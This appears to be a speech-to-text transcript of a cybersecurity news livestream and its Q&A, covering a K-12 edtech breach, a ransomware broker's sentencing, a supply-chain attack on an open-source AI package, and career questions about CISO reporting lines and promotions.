at the pharmaceutical company, they know who AstraZeneca is, okay? So you could be like, look, dude, AstraZeneca got hit. Like, they're targeting pharmaceuticals. It'll just hit a little bit more personal, right? It's like saying, like, there was an armed robbery at gunpoint in. In. In Toledo, Ohio, yesterday, right? You're like, okay, whatever, like, big deal. Now if I said there was an armed robbery at gunpoint resulting in grand theft auto, out, like on the street, outside your house, it's like, oh, that feels a bit more visceral. That feels a bit more personal, and it will stick a little bit better. So I'm not saying use fear, uncertainty, and doubt in order to, like, scare your CFO into giving you money, but use the stories that are more related to your business in order to get, you know, better traction, etc. Trust me.

B

Campus warns of a breach. If your kids don't already have some free credit monitoring, you're in luck. The popular K12 EdTech company Infinite Campus began warning customers that it suffered a data breach. The extortion group Shiny Hunters claim credit for the breach. Infinite Campus says the data was accessed through an employee's Salesforce account, a pretty familiar tactic for Shiny Hunters. The group gave the company until today to pay a ransom or leak out personally identifiable information and internal corporate data. Infinite Campus manages data on 11 million students across over 3,200 school districts in 46 states. Infinite Campus maintains that no customer databases were accessed in the attack. Russian access.

A

All right, I mean, Again, I don't research or prep for these shows, so I didn't know this was going to happen. But like, literally Shiny Hunters is part of that triumvirate. To use a, to use a vocabulary word that I picked up in like 10th grade lapsis. And then Shiny Hunters, like, these guys are very active, not necessarily getting paid, but like, they share techniques, they share tooling, and they, they're like, like a gang, basically. If you've seen the original Teenage Mutant Ninja Turtles movie from like 1991 or whatever, like Shredder had like a, a warehouse hangout for like, you know, basically Lost Boys essentially. That's, that's like what Shiny Hunters is like. They have like, you know, like a, like a hangout. It's virtual, but. And they commit crime instead of. Well, I guess Shredders, like miscreants also committed crime, but yeah, K through 12 system got breached. How did they get in there? The hackers access an employee's Salesforce account, exposing the information. All right, Salesforce is like the big dog in the room is around customer resource management. Lots of organizations use Salesforce for their sales pipeline. This right here hacked. Accessed an employee's Salesforce account. So the exposure of information is pretty limited. It's like what one, one employee could get. Number two, I don't think this is student accounts. Like, you know, the reporter jokingly said, oh, if your kid doesn't have identity theft protection, you know, you're in luck. They're going to. Infinite Campus, as far as I know, is not selling to children, they're not messaging children, they're selling to adults, they're selling to businesses. So, you know, I don't think, I don't think my son's gonna get identity theft protection from this. Second of all, one person. So either Infinite Campus doesn't use multi factor authentication, which would absolutely be egregious, or threat actors were able to steal session tokens or do some type of multi factor authentication, adversary in the middle attack, whatever it was. This is a breakdown in, in, you know, identity and authentication, but it, it is limited. They were able to figure it out. I, I don't think that this company will pay the ransom, frankly. They operationally, they're not impacted. They all that. It was like one form of ransomware where they exhale data and they're ransoming the data back to the victim organization. Infinite Campus, they have till March 25, which is today. Yeah. So cyber shin and gummy says Infinite Campus and Power School, all the kids data is screwed. I agree. The thing Is. And if you guys don't remember or you're new, right? Power School got hacked last year and yeah, Power School got hacked last year and Power School is in like 85% of United States K through 12 schools. As like a back end for like report cards and all that stuff. That information was the kids information. Like Power School got hosed completely. Pants, pants, like pants down in a large crowd. This Infinite Campus one, it. It definitely seems like. It's not that. It seems like it's more like, you know, sales data around potential customers. You can see here Infinite Campus is not going to engage the attacker. Why would they? Like, it's very little like liability for Infinite Campus, it would seem. And all they had to do was like, reset the user account's password, right? And, and, and revoke any current sessions. Like, this is. Dude, if today was your first day in incident response, this would be like a great one. Okay. Even if you did go to Memphis, you could reset the creds on this one and not have like PTSD from it. All right, let's keep cooking.

B

Sentence to 81 months. Back in November 2025, Alexei Volkov, aka Chewbacca Corps, pleaded guilty to six federal charges as part of his work in the Yan Lao Wang ransomware group. Volkov served as an initial access broker for the group, facilitating dozens of attacks, resulting in over $9 million of combined losses. The case provided a very clear picture on how initial access brokers work within ransomware organizations, how they're compensated, and the breadth of Yen Lao Wang's activities. A judge now sentenced him to 81 months in federal prison. Volkov must also pay full restitution to victims and turn over all equipment used in criminal activities.

A

All right, Chewbacca. Hilarious. Hilarious, dude. Someone told me a story last night at this dinner I went to. I can't remember who it was. I think it was Jason Haddock, but I'm not entirely sure because, remember I showed you guys the pay phone at the mid roll for the way back Wednesday stuff. We were talking about phones or whatever. Jason said a story where like some guy had a phone and like voicemail or whatever, and all the employees were told to call and like, do their best wookie impression. So this guy would regularly wake up in the morning and he'd have like 30 voicemails and he would have to check them because, like, you don't know which ones are legit and which ones are not. And it would just be like, like, it's just a bunch of people doing like, wookie sound effects. Every voicemail. Hilarious. Such a good prank to pull on people. All right, so this guy, do we have. I do not have the. Regulators mount up. But let's go ahead and do that. Right. Regulators mount up. If you got, if you're a squad member, go ahead and get into that. Chief Wiggum, justice is served. It's delicious. This guy right here is going to jail for 81 months, which if I'm doing some quick back of the napkin math, what is that, like almost seven years? I don't know where he's going to jail. Like, obviously he was arrested in Rome and X ray to the U.S. so he's going to be in a U.S. prison system, which is, you know, fine, whatever. I, I don't want to go to prison in any country. But like, you know, I've heard stories about Russian prisons being really bad, so at least he doesn't have to do that. This guy was basically. This guy ruined people's lives. Okay? Two victims paid one and a half million dollars combined. So this isn't like, you know, a couple bucks or like, you know, shaking you down for some lunch money. This is like life altering or business altering money. I don't. This guy. Yeah, good. More of this should happen. This is more, just cyber industry related, less cyber. Like you're not going to do anything with this information. So this particular guy, this ransomware gang would actually call the victims and harass them as well as do denial of service attacks. So just really quickly, when we talk about ransomware attacks, there's like three forms of ransomware. One is encrypting your data, which is the traditional one. Two is data exfil and selling it back to you. And then three is doing a denial of service attack. And like you pay the ransom to have this, the denial of service attack. Stop. You don't see the denial of service one happen very often. And threat actors are doing a lot more just data Excel without the encryption. But you can do all three. You can just do one of them. But this guy, this guy, you know, has to pay restitution. We'll see. You can see here, he must pay full restitution, including $9.1 million to identify companies and forfeit equipment used in the activities. I mean, forfeit equipment. I'm sure law enforcement confiscated all of it. I don't know, I don't know how jurisdiction works, right? Like if I'm live in Russia and I commit a bunch of crimes, but then I vacation to Rome and get arrested and put in a US jail. Like you're gonna go to Russia and take my equipment or, like, when he gets out of jail. Like, how do they. You can't, like, hold them against their will, can you? I don't know how it works. Anyways, this is a win for the good guys. I don't think this is going to curb any behavior. I don't think. Shiny hunters or laps. This is going to slow down, but. But, you know, let the system work. Let the. Let justice serve. Okay, let's do this. Let me. I gotta turn the volume down before I blow your ears out. Let's do this, then. Let's do this. A lot of manual today, guys. Here we go. All right, y', all, that's gonna do it. For today's news, it is top of the hour. I will be doing a. I gotta get a haircut guy. Look at this. I look like a C Anatomy. That's like, you know, a boat just drove over the water and churned it all up. I look like a lunatic. This was the Daily Cyber Threat Brief. I was coming to you live from, I don't know, Flatbush or something. San Francisco rsa. It's dark out. Coming to you from the cave. I'll be back in the Buffer Ozier Flow studio tomorrow. If today was Your first day, Mr. Buddha, I hope you had a great experience. If this was your first week, come back tomorrow. Come back tomorrow because we'll actually be in the studio with all the fancy equipment and whatnot. It's all about good times. I'll be at the airport in a few hours and just be traveling all day. Don't go anywhere, though, because we are going to do some jawjack. And I'm gonna do some AMA for a hot minute and get after it. First question. Hold on. Let me do the Jawjacking segue and we'll get into that. All right, don't go anywhere. I'll handle this. And then I'll answer Marcus Kyler's question. Ever wonder what it takes to break into cyber security? Join us every weekday for Jawjacking, where industry experts answer your burning questions about the cyber security field live, unfiltered, and totally free. 3. Let's level up together. It's time for some Jawjacking. All right, what's up, everybody? Welcome to the party. Let me. I gotta do the jawjacking. Is this Jawjack? No, that's not good. Jawjacking. Oh, my God. You know what? I'm just gonna do this one. Welcome to Jawjacking. I will answer any and all questions you have. They're Asked politely. And by politely, I mean just ask the question. Don't be like, hey, a hole. Answer my question. First question was Marcus Kyler saying, say what? My hair. See how, like the, the top of it here, when it gets really long, it looks like a sea anemone? Am I saying that wrong? Sea anemone. Hold on. This is what I'm talking about. See an enemy. Look at this. See an enemy, right? Look at my hair. No, I. Oh, hold on. Yeah, look at that. See what I mean? That's the first. No, hold on, lady trying to do a bit here. See that? Look at the top of my hair. Then look at that all day, every day. That's what's going on. All right. If you have any questions, put them in chat. I do want to answer them to the best of my ability. We're just having a little bit of fun with the sea anemone. But I, I do want to answer your questions and get them on stream. That's the point of jawjacking. It's not to hear me flip out about it looks like bedhead. Thank you, Zach Hill. How's. How's rsa? RSA is good, man. You know, I got asked, I was interviewed for something and they asked me, like, what's the buzz at rsa? Like, yeah, listen, RSA is cool. I like it better this year than I did last year. Agentic AI is kind of like the big thing everywhere. Aiai. But what I will say is I'm pleasantly surprised that there is a very thick undercurrent of like managing AI and like getting control on AI. Not necessarily controlling like the explosive growth of it and everything, but like, basically everyone is kind of agreed that like we're going to be rolling out AI on all the things. But like, how do you manage that? How do you get visibility? How do you inventory it? How do you control what is appropriate and was not appropriate for end users? How do you. Do you control outputs of AI? How do you control non human identities doing things that they're permitted to do, but they're doing it with malicious intent? Right? So that, to me, that's like a sneaky main pillar of rsa or at least the. The meta of rs rsa this year. Did you hear about the power grid hit in Valley City, North Dakota? Reaper Doe says no, and I told Reaper Doe that I would answer their question. So I'm assuming this is it. Power grid, Valley City, North Dakota. Also, Reaper Doe, it looks like your CAPS lock is on if you're trying to log into something and the password's not working. Chances are. That's why. Let's take a look at this really quickly on North Dakota power outage. Everything looks good. The, the map is reading clear. So I don't know where Valley City, North Dakota is, but it doesn't look bad right now. Also, with all due respect, Reaper Doe, I don't actually see any news stories around power outages for Valley City, North Dakota. Is this it? Oh, I mean they're scheduled maintenance on West 25th street, but yeah, I don't know anything about this story and it looks like the Internet does not. It's not covering it yet. So maybe it's just breaking news continuing to look, if you have a question, put it in chat with a Q Code Brew asks, with open AI shutting down their video generation app, do you think this is the start of streamlining an attempt to make AI profitable or a sign that the cracks are starting to show? So I had a conversation with Elliot Matice on Monday night and Elliot Tice is a squad member or he's a simply cyber community member, but he's like got big vision on like geopolitics and stuff. Couple things. One, open AI is not profitable, right? They have like a hundred billion dollar valuation and they are getting all sorts of investment but like I don't think they're profitable right now, which is fine. Right? Like all sorts of tech startups burn money and don't report profit for quite a while. But the video generation part of it, I, I didn't know that they did that, is that Sora is open AI's video generation Sora. The only thing I can think of is if they're shutting it down, it's either A, maybe they're going to sell the technology, B, they need to allocate resources to other parts of the business. Maybe you know how they just signed with the Department of Defense to like basically make. They didn't say this, so I don't know definitively, but it seems like killer AI, like basically T1000s. Maybe they need to allocate resources to that part of the business because that will be big pro, big contracts and big money. I do, I do want to say as far as Elliot Matice goes, these companies are all the whole. There's a big talk about AI bubble crashing and oddly I didn't know about this but like the, the stuff going in Iran has to do with petroleum, you know, the flow of oil and petroleum being impacted and there's something called petrodollars that, that gets invested into the US stock market. And like, you know, those are going to be problematic since there's like a, a chokehold being put on the oil and gas industry, for lack of a better term. So I honestly, I think Code. Code Brew. I think it's just a business decision to manage, spend and allocate resources to other parts. I wouldn't say it's like them hemorrhaging and it's a, a sign of cracks. Rich 464 says the supply chain attack for Light LLM via PI PI is wild. The team responsible is saying they're going to continue to attack systems like this going forward. How do you protect and inform your team? Hold on, I don't know this one. Light LLM. PI PI. Shoot. Hold on one second. Give me, give me one second. My wife just called me. Oh no, never mind. What's that? What's today? Okay, I'm sorry guys. I. When my wife calls, it's like it's a priority. All right, so I'm looking at this story right here. All right? Oh, Whiz covered it. Three is a Crowd. TPCP trojanizes Light LLM and continuation of Campaign Team PCP is attacking open source projects. Okay, so here's the deal. Correct me If I'm wrong, Rich464, but the problem is threat actors are attacking open source code repositories and introducing malware into them. Okay? Anytime you use open source, you got to be mindful of that. The question was, how do you protect and inform your team? Well, okay, so inform your team. That's easy, right? Hey guys, listen. Here's multiple examples of GitHub repositories being compromised. Fact. Okay, so be mindful. Sometimes you don't even know that you're using a product that has a GitHub project inside of it, right? Like we saw this with log 4J years ago, like 20, 21. All sorts of systems had log 4J, but it was like, you know, supply chain where it was baked in and then a product was baked in and then the product was baked in. So it was like six degrees of separation. So we didn't even know that you had it. So you can't absolutely minimize this risk to zero. But number one, be mindful of where you're getting your code from. Number two, you should absolutely have, you should absolutely have detections in place. If you're relying on protection controls exclusively, which I'm not going to hate on you like that. That, that is like pretty common, right? If you look at any information security program that's like, immature or, you know, just kind of burgeoning. The Identify and protect controls in the NIST CSF are going to be much higher as far as implementation. The maturity level of your identify and protect is going to be higher than your detect, respond and recover. But for this, like, obviously, you know, if malware detonates in your environment, there's going to be weird services, there's going to be C2 traffic, there's going to be data exile, potentially there's going to be signatures of compromise or indicators of compromise. So having those detections in place at least can identify that. You know, basically the dwell time or the mean time to detection can be reduced pretty quickly. So you can intervene and hopefully reduce the impact of a exploit. So let's go. I'm gonna do 15 more minutes. Let's go. Here. AI, AI, AI. All right, I'm looking at chat right now. Someone just said Cuba. How do you power AI and provide enough fresh water? I don't know. I guess. Is that. Is that a problem? Like, is there an AI fresh water issue? I don't know that one. Please. Justin Gold. I feel like if. If there is some type of, like, thing around that Justin Gold's got the T on it. Is UAV security pretty much the same as cloud security? Is that a joke, Kyle? I mean, that's. That is funny, right? So I'm assuming he means unmanned air vehicle, like a drone. And since drones fly, they're in the clouds. So I. This is funny. That's a good joke. Okay, so Code Brew says it's. They're shutting Soar down. They're. Dude, they're either selling it or it's just like they're reallocating resources. Trini Hefe. Might be a silly question. If it is, it's fine. Like, every question is welcome here if it's asked with good intent. Having an alias as my username instead of my real name. Cause any hiccups or obstacles if I'm audited for my CPEs, like, using my comments as proof of being here. No, I mean, I feel like if in. Okay, so, like, if I put my auditor hat on and I'm like, hey, listen, I need you to prove that you have these CPEs, and you send me a bunch of screenshots and every single one says Trini Jefe, I'm gonna be like, okay. Like, okay, like, here's the evidence. And then if I wanted to say, wait a minute, who's Trini Jefe? You could, like, you could easily be like, I Can show you, like, one, here. Here's like a screenshot of me having access to the user account. Or two, you could even just comment in chat and say, like, this is evidence for auditor Jerry Oer, who asked me on March 25th to prove that I am the person I said I am. And then take a screenshot of that and be like, clearly, I'm the one who wrote that and no one else. Like, it's so unique a piece of evidence to demonstrate. Like, that's a silly way to get to the result, but as an auditor, that would be fine for me. Okay. Yeah, a lot of people are talking here that, like, Disney backed out of the deal. That's fine. Silence Poet says, my manager is being promoted soon. I've been in this risk analyst position for six months, but my director thinks I can move up. Is it too soon? No, no, man. No. I mean, do you want to be a manager? I mean, that's the question. I mean, if you're a smaller organization, Silence Poet, you're probably still going to be hands on keyboard. But if you're at a larger organization and you become a manager, you're managing people now, not managing risk or tech. So, I mean, does it align with your career? That's what I would say. Don't, don't. I mean, if you don't feel ready for it, but your leadership thinks you are, you know, you could tell them, like, hey, like, this would be. This would make me uncomfortable, but I want to do it. And like, you know, what kind of training can I get in order to, like, level up and be the best manager possible? You know what I mean? Like, kind of like, set yourself up for success. Normally it's the other way around where you want the promotion and you're, like, trying to convince management so they obviously see something in you also. Silence Poet, let me know if you still want to do the poker tournament. Remember, it's simply cybercon. Any activity that people want, we can. I can help you get set up, but any activity has to have someone own it. That's not me. Except for the Magic the Gathering tournament, I'm going to own that. How's your thumb doing? It's pretty much healed. Although you can see. I don't know if you'll be able to see, but whatever, it's, it's healed. Thanks for asking. B. Nash, have you hit that, like, button yet? Kimberly can fix it. You're the best, Kimberly. All right. Continuing to cruise through questions. Shout out to waiting through logs. Wade Wells. Good to see him back Congratulations to him for all his personal success. Why is perfectionism, perfectionism detrimental to grow in the industry? I don't, I mean, I don't know if it's detrimental, but I, I would say, I, I guess I would just say this. There's so much to do, there's so much to learn. No one's going to be an expert of anything because there's just too much and it changes so quickly. So if you strive for perfection, you're probably going to not be, you're not going to be moving very quickly because, like, the first 80% you can get. The first 80% you can get for 20% of the time. The last 20% would take 80% of the time. So you're actually like doing yourself a disservice by, you know, getting a broader knowledge and taking advantage of other opportunities. So I could say that might be why perfectionism could hinder you. Yeah. Oh, okay. Again, I guess, like, like, I don't prep or research the stories. I'm reading the question and answering and then I scroll, chat. So I see, chat like TJ and Justin and others sharing their thoughts on that question. So thanks, guys. And by the way, I love that the squad, the Simply Cyber Community Team sc. I love that you guys share your thoughts and mentorship in the chat as well. I got to see Phil Stafford yesterday. Shout out to Phil Stafford's wife and you know, and, and Phil's calves. Like, there was a whole thing with Phil's calves yesterday. And Phil, Phil said that his is. He was, him and his wife were talking. She said that he does have nice cabs. So I was saying it as a joke, but spoiler joke's on me. Phil's calves are quite nice. How are the TSI lines? T. TSA lines Going into rsa, dude, Michael, I flew out of Charleston. I had like literally a 30 second TSA experience. San Francisco has a privatized TSA and the word on the street is like, you just walk right through. It's no big deal. Now ICE has been deployed in a bunch of places since I got here, so I don't know, I'm gonna get to the airport like five hours early because I'm not one of these guys who's like, oh, I've got a two hour layover. I'll just take an Uber and go do San Francisco for a minute. Go to the Fisherman's Warf and then go back to the airport. No, my, my butt goes to the airport and sits at the gate. I've got work to Do. I've got audio books to listen to. I'm exhausted. I've been working all day, networking all night and then getting up at 3:30 in the morning to call my son to, to wish him a ha. A good day at school and then get prepped for the show. Right? So I. This, this. Do you see what I look like? This is not, this isn't manufactured. I look like, I look like I was, I look like a catcher's mitt right now. I look like a. Just a old beat in catcher's mitt. Ugh. Like I'm, I'm sorry for you guys like that. You have to look at my face. I'm, I'm like. Is your opinion. Who should the CISO report to? Very good question. I think in smaller organizations CISO should report to cio. I think in larger organizations CISO should report to legal general counsel. There's a case to be made for the CISO to report to cfo. But in smaller organizations it's kind of hard to get like a separate budget. So like if you go through cio, there's absolutely going to be budget. If you have a good relationship with the CIO at larger organizations, they have more budget and lots more going on. So you could actually get like by not reporting the cio, you kind of avoid conflicts of interest. And by the way, if anyone is like curious, like what, what kind of conflict of interest? I'll just give you a quick example. A CIO is typically responsible chief information officer at a business. They're responsible for applications, information security, data and infrastructure like servers and endpoints and stuff, right? So that's the CIO's world. The CIO is responsible for making sure that work can get done, business can get done. So if there is a problem, right? And the choices are we need to take this off the network because it's a bad thing. That's cyber security's deal. And the CIO says no, we're going to leave it up because it's mission critical and we need to keep making money packets, need to keep flowing. You figure it out that that 5 nines that performance. If the CISO reports to the CIO, the CIO gets the final say. So that's an example of where that conflict could come up. All right, Roswell, uk signing up for the meta ctf. I love the meta CTF people by the way tech runs telling Silence Poet to take that promotion to do it. The words of Al Emperor Palpatine, it's a bank. I eventually want to go off on my own. Yeah, No, I think I would do it then definitely get that leadership experience. And if you can keep your technical chops good as well. Michael Fink saying stacks and mill commander at simply Cybercon. Yeah, I mean, I. This is not going to resonate with many people in the chat, so I'll just say it quite quickly. I. I'm proposing a Rule 0. One match or one, one segment of the conference for like anything goes decks. And then we can have like rule zero of like bracket two, bracket three only. All right. Today's the blue team summit. Yeah, today. Today is anti siphon sock Summit starts at 10am 30 minutes from now. Continuing to scroll chat team SC in space. Who's going to the sock summit today? Drop it in chat. Drop it in chat. Who's going to the sock summit? William Bailey. He's got first world problems that I know nothing about. Apparently the AMEX Platinum lounge is being selected that you can only go in there 90 minutes before takeoff. I. I don't know. And by the way, I'm. I'm being like playful. William Bailey. I'm being playful. Trust me, if I had an AMEX and access to the Platinum Lounge, you can bet that's where you'd find me. You catch me outside. How about that? All right. And I think I could go to the Delta Lounge. I don't know. I've never done those things, so. I don't even know about that. Christopher Reyes. This is a great example where I don't know what you're talking about. So what happened? I need more context. I'm happy to answer any questions, but I just need context. A lot of people traveling early. CISO should report to CEO Marcus Kyler of the Yeet Crew says, do I have Yeet on here? No. Getting to the airport is so hot right now.

B

That Hansel's so hot right now.

A

I was looking for an excuse to play that. Okay. A lot of people having opinions on how CISO should report. Very cool. I could see CISO reporting CEO as well. Definitely a good option. Oh. Two Cyber Chicks is at 9:30am today. Thank you. Kimberly can fix it. Let's go ahead and do that. I was going to go to 9:30 anyway. So this is a perfect. This is perfect. Two cyber chicks love. Love what they're doing. Here we go. Let me do this. Let me do this. Let me do this. Let me. No, let me do this. Let me do this. Let me do this. Let me do this. Wink. So. Season 8 Episode 3 Two Cyber Chicks we can rate it Bruh. There you go. Oh, yeah. I fly Delta. All right, Zach Hill is going to the airport to pick his mom up. Love it. Ross. The boss knows about the Amex Platinum Lounge. Loving it. I don't have an amex. I have a Chase card. All right, so I am caught up on chat. Hey, I want to say what's up. I know she didn't say hi to me, but Shimeri Gonzalez. What's up? Big fan of hers. She's good people. All right, we're caught up in chat. If you have a question, drop it in chat. I'll answer it. Otherwise, we're gonna raid two cyber chicks in just a minute. Shout out to all y'. All. Thank you so much for bearing with me the last couple days. We had a lot of technical difficulties, but we worked through it. I show up, guys. I show up. I'm so proud. It's such an honor to be able to serve this community in this capacity. So thank you for that. I appreciate it. All right, guys, 57 seconds till go. Live, two cyber chicks, Erica McDuffie, Jack Scott, talking about the business winning, the hard truth about being a cso. So if you want to be a CSO and you want to hear straight facts, come on down. Check this out. Two cyber checks right now. I'm Jerry from Simply Cyber. This has been the daily cyber threat brief. I'll see you guys tomorrow. If you. If you need me in the next. If you need me until tomorrow, come find me. I'll be passed out in an airport. Until next time, stay secure. See.